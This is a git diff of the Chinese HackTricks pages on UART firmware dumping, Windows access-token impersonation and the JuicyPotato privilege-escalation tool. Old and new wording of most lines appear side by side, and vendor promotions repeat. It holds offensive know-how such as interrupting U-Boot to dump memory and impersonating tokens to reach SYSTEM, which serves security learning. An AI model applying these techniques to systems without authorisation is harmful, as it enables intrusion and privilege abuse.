* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -30,11 +30,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 基本信息
UART是一种串行协议意味着它以一位一次的方式在组件之间传输数据。相比之下并行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express和USB。
UART是一种串行协议意味着它一次传输一个比特的数据。相比之下并行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express和USB。
通常在UART处于空闲状态时线路保持高电平逻辑1值。然后为了信号化数据传输的开始,发送器向接收器发送起始位,此时信号保持低电平逻辑0值。接下来发送器发送包含实际消息的五到八个数据位然后是一个可选的奇偶校验位和一个或两个停止位逻辑1值具体取决于配置。奇偶校验位用于错误检查在实践中很少见。停止位或位表示传输结束。
通常在UART处于空闲状态时线路保持高电平逻辑1值。然后为了表示数据传输的开始,发送器向接收器发送起始位,在此期间信号保持低电平逻辑0值。接下来发送器发送包含实际消息的五到八个数据位然后是一个可选的奇偶校验位和一个或两个停止位逻辑1值具体取决于配置。奇偶校验位用于错误检查在实践中很少见。停止位或位表示传输结束。
我们称最常见的配置为8N1八个数据位无奇偶校验一个停止位。例如如果我们想要在8N1 UART配置中发送字符C或ASCII中的0x43我们将发送以下位0起始位0、1、0、0、0、0、1、1二进制0x43的值以及0停止位
我们称最常见的配置为8N1八个数据位无奇偶校验一个停止位。例如如果我们想要在8N1 UART配置中发送字符C或ASCII中的0x43我们将发送以下位0起始位0、1、0、0、0、0、1、1二进制0x43的值以及0停止位
![](<../../.gitbook/assets/image (761).png>)
@ -48,20 +48,20 @@ UART是一种串行协议意味着它以一位一次的方式在组件之间
UART有4个端口**TX**(发送)、**RX**(接收)、**Vcc**(电压)和**GND**。您可能会在PCB上找到带有**`TX`**和**`RX`**字样的4个端口。但如果没有指示您可能需要使用万用表或逻辑分析仪自行查找。
使用**万用表**和设备关闭电源
使用**万用表**和关闭设备
* 使用**连续性测试**模式识别**GND**引脚,将后端插入地线并用红色探针测试,直到听到万用表发出声音。在PCB上可能会找到几个GND引脚因此您可能已经找到或未找到属于UART的引脚。
* 要识别**VCC端口**,设置**直流电压模式**并将其设置为20V电压。黑色探针接地红色探针接引脚。打开设备电源。如果万用表测量到3.3V或5V的恒定电压则找到了Vcc引脚。如果获得其他电压试其他端口。
* 使用**连续性测试**模式识别**GND**引脚,将后端插入地线并用红色探针测试,直到听到万用表发出声音。PCB上可能有几个GND引脚因此您可能已经找到或未找到属于UART的引脚。
* 要识别**VCC端口**,设置**直流电压模式**并将其设置为20V电压。黑色探针接地红色探针接引脚。打开设备电源。如果万用表测量到3.3V或5V的恒定电压则找到了Vcc引脚。如果获得其他电压试其他端口。
* 要识别**TX** **端口****直流电压模式**最高20V电压黑色探针接地红色探针接引脚打开设备电源。如果发现电压在几秒钟内波动然后稳定在Vcc值您很可能找到了TX端口。这是因为在上电时它会发送一些调试数据。
* **RX端口**将是其他3个端口中最接近的一个其电压波动最小总体值最低。
您可以混淆TX和RX端口不会发生任何事情但如果混淆GND和VCC端口可能会烧毁电路。
您可能会混淆TX和RX端口什么也不会发生但如果混淆GND和VCC端口可能会烧毁电路。
在某些目标设备中制造商通过禁用RX或TX甚至两者来禁用UART端口。在这种情况下追踪电路板中的连接并找到一些分支点可能会有所帮助。关于确认未检测到UART和电路断开的强烈提示是检查设备保修。如果设备已经附带了一些保修制造商会留下一些调试接口在本例中为UART因此必须已经断开了UART并且在调试时会重新连接。这些分支引脚可以通过焊接或跳线线连接。
在某些目标设备中制造商通过禁用RX或TX甚至两者中的一个来禁用UART端口。在这种情况下追踪电路板中的连接并找到一些分支点可能会有所帮助。关于确认未检测到UART和电路断开的一个强烈提示是检查设备保修。如果设备已经附带了一些保修制造商会留下一些调试接口在本例中为UART因此必须已经断开了UART并且在调试时会重新连接。这些分支引脚可以通过焊接或跳线线连接。
### 识别UART波特率
识别正确波特率的最简单方法是查看**TX引脚的输出并尝试读取数据**。如果收到的数据无法读取请切换到下一个可能的波特率直到数据可读。您可以使用USB转串口适配器或与辅助脚本配对的多功能设备例如[baudrate.py](https://github.com/devttys0/baudrate/)Bus Pirate来执行此操作。最常见的波特率为9600、38400、19200、57600和115200。
识别正确波特率的最简单方法是查看**TX引脚的输出并尝试读取数据**。如果收到的数据无法读取请切换到下一个可能的波特率直到数据可读。您可以使用USB转串口适配器或与辅助脚本配对的多功能设备如Bus Pirate来执行此操作例如[baudrate.py](https://github.com/devttys0/baudrate/)。最常见的波特率是9600、38400、19200、57600和115200。
{% hint style="danger" %}
重要提示在此协议中您需要将一个设备的TX连接到另一个设备的RX
@ -69,7 +69,7 @@ UART有4个端口**TX**(发送)、**RX**(接收)、**Vcc**(电压
## CP210X UART转TTY适配器
CP210X芯片用于许多原型板如NodeMCU带有esp8266用于串行通信。这些适配器价格相对较低可用于连接到目标的UART接口。该设备有5个引脚5V、GND、RXD、TXD、3.3V。确保将电压连接到目标支持的电压以避免任何损坏。最后将适配器的RXD引脚连接到目标的TXD将适配器的TXD引脚连接到目标的RXD。
CP210X芯片用于许多原型板如NodeMCU带有esp8266用于串行通信。这些适配器相对便宜可用于连接到目标的UART接口。该设备有5个引脚5V、GND、RXD、TXD、3.3V。确保将电压连接到目标支持的电压以避免任何损坏。最后将适配器的RXD引脚连接到目标的TXD将适配器的TXD引脚连接到目标的RXD。
如果适配器未被检测到请确保在主机系统中安装了CP210X驱动程序。一旦检测到并连接了适配器可以使用picocom、minicom或screen等工具。
@ -85,7 +85,7 @@ picocom /dev/<adapter> --baud <baudrate>
```
minicom -s
```
配置`串行端口设置`选项中的波特率和设备名称。
配置`串行端口设置`选项中的波特率和设备名称等设置
配置完成后,使用`minicom`命令启动UART控制台。
@ -93,11 +93,11 @@ minicom -s
如果没有UART串行到USB适配器可用可以通过快速hack使用Arduino UNO R3。由于Arduino UNO R3通常随处可得这可以节省大量时间。
Arduino UNO R3板上已经内置了USB到串行适配器。要获得UART连接只需从板上拔下Atmel 328p微控制器芯片。这个hack适用于Arduino UNO R3变种其上没有焊接Atmel 328p芯片采用SMD版本。将Arduino的RX引脚数字引脚0连接到UART接口的TX引脚将Arduino的TX引脚数字引脚1连接到UART接口的RX引脚。
Arduino UNO R3板上已经内置了USB到串行适配器。要获得UART连接只需从板上拔下Atmel 328p微控制器芯片。这个hack适用于Arduino UNO R3变种其上未焊接Atmel 328p芯片SMD版本。将Arduino的RX引脚数字引脚0连接到UART接口的TX引脚将Arduino的TX引脚数字引脚1连接到UART接口的RX引脚。
最后建议使用Arduino IDE获取串行控制台。在菜单中的`工具`部分中,选择`串行控制台`选项并根据UART接口设置波特率。
## 怪盗海盗
## 怪盗船长
在这种情况下我们将窃取Arduino的UART通信该通信将所有程序打印发送到串行监视器。
```bash
@ -171,39 +171,39 @@ Escritura inicial completada:
AAA Hi Dreg! AAA
waiting a few secs to repeat....
```
## 通过UART控制台转储固件
## 使用UART控制台转储固件
UART控制台为在运行时环境中处理底层固件提供了一个很好的方式。但是当UART控制台访问是只读时可能会引入很多限制。在许多嵌入式设备中固件存储在EEPROM中并在具有易失性内存的处理器中执行。因此固件保持为只读因为在制造过程中原始固件位于EEPROM内部,任何新文件都会由于易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。
UART控制台为在运行时环境中处理底层固件提供了一个很好的方式。但是当UART控制台访问是只读时可能会引入很多限制。在许多嵌入式设备中固件存储在EEPROM中并在具有易失性内存的处理器中执行。因此固件保持为只读因为在制造过程中原始固件就在EEPROM中,任何新文件都会由于易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。
多方法可以做到这一点SPI部分涵盖了使用各种设备直接从EEPROM提取固件的方法。尽管如此建议首先尝试使用UART转储固件因为使用物理设备和外部交互转储固件可能存在风险。
多方法可以做到这一点SPI部分涵盖了使用各种设备直接从EEPROM提取固件的方法。尽管如此建议首先尝试使用UART转储固件因为使用物理设备和外部交互转储固件可能存在风险。
从UART控制台转储固件需要首先访问引导加载程序。许多知名供应商使用<u>uboot</u>(通用引导加载程序)作为其引导加载程序来加载Linux。因此访问<u>uboot</u>是必要的。
从UART控制台转储固件需要首先访问引导加载程序。许多知名供应商使用<u>uboot</u>(通用引导加载程序)作为加载Linux的引导加载程序因此访问<u>uboot</u>是必要的。
要访问<u>boot</u>引导加载程序请将UART端口连接到计算机并使用任何串行控制台工具保持设备的电源断开。设置准备就绪后,按下回车键并保持按住。最后,连接设备的电源并让其引导。
要访问<u>boot</u>引导加载程序请将UART端口连接到计算机并使用任何串行控制台工具同时保持设备的电源断开。设置准备就绪后,按下回车键并保持按住。最后,连接设备的电源并让其引导。
这样做将中断<u>uboot</u>的加载并提供一个菜单。建议了解<u>uboot</u>命令并使用帮助菜单列出它们。这可能是`help`命令。由于不同供应商使用不同的配置,因此有必要分别了解每个供应商的配置。
这样做将中断<u>uboot</u>的加载并提供一个菜单。建议了解<u>uboot</u>命令并使用帮助菜单列出它们。这可能是`help`命令。由于不同供应商使用不同的配置,有必要分别了解每个配置。
通常,转储固件的命令是:
```
md
```
which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
这代表“内存转储”。这将在屏幕上转储内存EEPROM 内容)。建议在开始过程之前记录串行控制台输出以捕获内存转储。
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
最后,只需从日志文件中剥离所有不必要的数据,并将文件存储为 `filename.rom`,然后使用 binwalk 提取内容:
```
binwalk -e <filename.rom>
```
这将列出根据在hex文件中找到的签名可能的EEPROM内容。
这将列出根据在十六进制文件中找到的签名可能的EEPROM内容。
尽管如此,需要注意的是,即使正在使用,也不总是情况<b>uboot</b>解锁。如果按Enter键没有任何反应请检查不同的键如空格键等。如果引导加载程序已锁定且无法中断,则此方法将无效。要检查<b>uboot</b>是否为设备的引导加载程序请在设备启动时检查UART控制台上的输出。它可能在启动时提到<b>uboot</b>
尽管如此,需要注意的是,即使正在使用,也不总是情况<b>uboot</b>解锁。如果按Enter键没有任何反应请检查不同的键如空格键等。如果引导加载程序已锁定且未被中断,则此方法将无效。要检查<b>uboot</b>是否为设备的引导加载程序请在设备启动时检查UART控制台上的输出。在启动时可能会提到<b>uboot</b>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,以检查公司或其客户是否已受到**窃取恶意软件**的**损害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -211,12 +211,12 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

50
windows-hardening/windows-local-privilege-escalation/access-tokens.md
View file

@ -4,21 +4,21 @@
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗?您想看到您的**公司在HackTricks中被广告**吗?或者您想访问**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中被宣传**吗? 或者您想要访问**PEASS的最新版本或下载HackTricks的PDF**吗? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上**关注**我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,9 +28,9 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
## 访问令牌
每个**登录到系统的用户**都持有一个包含该登录会话安全信息的访问令牌。当用户登录时,系统会创建一个访问令牌。**代表用户执行的每个进程**都有访问令牌的副本。该令牌标识用户、用户的组和用户的特权。令牌还包含一个标识当前登录会话的登录SID安全标识符
每个**登录到系统的用户**都持有一个包含该登录会话安全信息的访问令牌。当用户登录时,系统会创建一个访问令牌。**代表用户执行的每个进程**都有访问令牌的副本。该令牌标识用户、用户所属的组以及用户的权限。令牌还包含一个标识当前登录会话的登录SID安全标识符
您可以通过执行`whoami /all`查看此信息。
您可以通过执行 `whoami /all` 查看这些信息。
```
whoami /all
@ -74,14 +74,14 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
或者使用Sysinternals的_Process Explorer_选择进程并访问"Security"选项卡):
或者使用来自Sysinternals的_Process Explorer_选择进程并访问"Security"选项卡):
![](<../../.gitbook/assets/image (769).png>)
### 本地管理员
当本地管理员登录时,**会创建两个访问令牌**:一个具有管理员权限,另一个具有普通权限。**默认情况下**,当此用户执行进程时,将使用具有**常规**(非管理员)**权限的令牌**。当此用户尝试以管理员身份执行任何操作(例如"以管理员身份运行")时,将使用**UAC**请求权限。\
如果您想[**了解更多关于UAC的信息请阅读此页面**](../authentication-credentials-uac-and-efs/#uac)**。**
当本地管理员登录时,**会创建两个访问令牌**:一个具有管理员权限,另一个具有普通权限。**默认情况下**,当此用户执行进程时,将使用具有**常规**(非管理员)**权限的令牌**。当此用户尝试以管理员身份执行任何操作(例如"以管理员身份运行")时,将使用**UAC**请求权限。\
如果您想[**了解更多关于UAC的信息请阅读此页面**](../authentication-credentials-uac-and-efs/#uac)**。**
### 凭据用户模拟
@ -94,11 +94,11 @@ runas /user:domain\username cmd.exe
```
runas /user:domain\username /netonly cmd.exe
```
这在您拥有访问网络中对象的有效凭据,但这些凭据在当前主机内无效时非常有用(因为它们仅在网络中使用,在当前主机中将使用当前用户权限)。
这在您拥有访问网络中对象的有效凭据,但这些凭据在当前主机内无效时非常有用(因为它们仅在网络中使用,在当前主机中将使用当前用户权限)。
### 令牌类型
有两种类型的可用令牌
有两种类型的令牌可用:
- **主令牌**:它作为进程安全凭据的表示。主令牌的创建和与进程的关联是需要提升的特权的操作,强调特权分离的原则。通常,认证服务负责令牌的创建,而登录服务处理其与用户操作系统 shell 的关联。值得注意的是,进程在创建时继承其父进程的主令牌。
- **模拟令牌**:赋予服务器应用程序临时采用客户端身份以访问安全对象的能力。此机制分为四个操作级别:
@ -109,7 +109,7 @@ runas /user:domain\username /netonly cmd.exe
#### 模拟令牌
使用 metasploit 的 _**incognito**_ 模块,如果您拥有足够的权限,可以轻松**列出**和**模拟**其他**令牌**。这对于以其他用户身份执行操作非常有用。您还可以通过此技术**提升权限**。
使用 metasploit 的 _**incognito**_ 模块,如果您拥有足够的权限,可以轻松**列出**和**模拟**其他**令牌**。这对于以其他用户身份执行操作非常有用。您还可以通过此技术**提升权限**。
### 令牌特权
@ -121,17 +121,17 @@ runas /user:domain\username /netonly cmd.exe
查看[**所有可能的令牌特权以及有关此外部页面的一些定义**](https://github.com/gtworek/Priv2Admin)。
## 参考
## 参考资料
在这些教程中了解更多关于令牌的信息[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) 和 [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
在这些教程中了解更多关于令牌的知识[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) 和 [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -141,10 +141,10 @@ WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
- 您在**网络安全公司**工作吗? 想在 HackTricks 中看到您的**公司广告**吗? 或者您想**获取最新版本的 PEASS 或下载 PDF 版本的 HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
- 您在**网络安全公司**工作吗? 想在 HackTricks 中看到您的**公司广告**吗? 或者您想**获取 PEASS 的最新版本或下载 PDF 版本的 HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
- 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我**
- 通过向 [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) 和 [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来分享您的黑客技巧。
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我**
- **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享您的黑客技巧。**
</details>

70
windows-hardening/windows-local-privilege-escalation/juicypotato.md
View file

@ -4,76 +4,76 @@
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中做广告**吗? 或者想要访问**PEASS的最新版本或下载HackTricks的PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) **Discord群组** 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享的黑客技巧。**
* 你在**网络安全公司**工作吗?想要看到你的**公司在HackTricks中被宣传**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASS和HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) **Discord群**](https://discord.gg/hRep4RUj7f) 或 **电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享的黑客技巧。**
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以在他们的网站上免费尝试他们的引擎:
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotato在** Windows Server 2019 和 Windows 10 版本1809及更高版本上**不起作用**。 但是,可以使用[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) **利用相同的权限并获得`NT AUTHORITY\SYSTEM`**级别访问。 _**查看:**_
**JuicyPotato在** Windows Server 2019 和 Windows 10 版本1809之后**不起作用**。但是,可以使用[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)来利用相同的权限并获得`NT AUTHORITY\SYSTEM`级别访问权限。_**查看:**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](roguepotato-and-printspoofer.md)
{% endcontent-ref %}
## Juicy Potato滥用黄金权 <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
## Juicy Potato滥用黄金权) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
_带有一点果汁的_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_的糖化版本,即**另一个本地权限提升工具从Windows服务帐户提升到NT AUTHORITY\SYSTEM**_
_一个经过加糖处理的_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_带有一点果汁,即**另一个本地权限提升工具从Windows服务帐户提升到NT AUTHORITY\SYSTEM**_
#### 您可以从[https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)下载JuicyPotato
### 摘要 <a href="#summary" id="summary"></a>
[**从juicy-potato自述文件中**](https://github.com/ohpe/juicy-potato/blob/master/README.md)****
[**从JuicyPotato自述文件中了解**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)及其[变体](https://github.com/decoder-it/lonelypotato)利用基于[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [服务](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)的特权升级链,在`127.0.0.1:6666`上具有MiTM监听器并且当您拥有`SeImpersonate`或`SeAssignPrimaryToken`权限时。 在Windows构建审查期间我们发现了一个设置其中`BITS`被故意禁用,端口`6666`被占用。
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)及其[变体](https://github.com/decoder-it/lonelypotato)利用基于[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx)的特权升级链[服务](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)在`127.0.0.1:6666`上具有MiTM监听器当您拥有`SeImpersonate`或`SeAssignPrimaryToken`权限时。在Windows构建审查期间我们发现了一个设置其中`BITS`被故意禁用,端口`6666`被占用。
我们决定武化[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)**欢迎Juicy Potato**。
我们决定武化[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)**欢迎Juicy Potato**。
> 有关理论,请参阅[Rotten Potato - 从服务帐户提升到SYSTEM的特权提升](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/),并跟随链接和引用链。
> 欲了解理论,请参阅[Rotten Potato - 从服务帐户提升到SYSTEM的特权提升](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/),并跟随链接和参考链。
我们发现,除了`BITS`还有几个COM服务器可以滥用。 它们只需要:
我们发现,除了`BITS`外还有几个COM服务器可以滥用。它们只需要
1. 可由当前用户(通常是具有模拟权限的“服务用户”)实例化
1. 可由当前用户(通常是具有模拟权限的“服务用户”)实例化
2. 实现`IMarshal`接口
3. 作为提升用户SYSTEM、管理员等运行
经过一些测试我们获得并测试了在几个Windows版本上的广泛列表的[有趣CLSID](http://ohpe.it/juicy-potato/CLSID/)。
